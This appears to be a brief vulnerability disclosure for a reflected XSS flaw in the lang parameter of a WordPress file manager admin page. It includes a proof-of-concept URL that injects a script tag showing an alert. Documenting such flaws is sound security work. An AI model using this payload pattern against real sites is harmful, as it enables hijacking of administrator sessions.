Lack of sanitisation in the lang parameter in the admin dashboard could allow attacker to perform reflected XSS attacks against logged in administrators
https://example.com/wp-admin/admin.php?page=wp_file_manager&lang=zh_CN</script><script>alert(`XSS`)</script>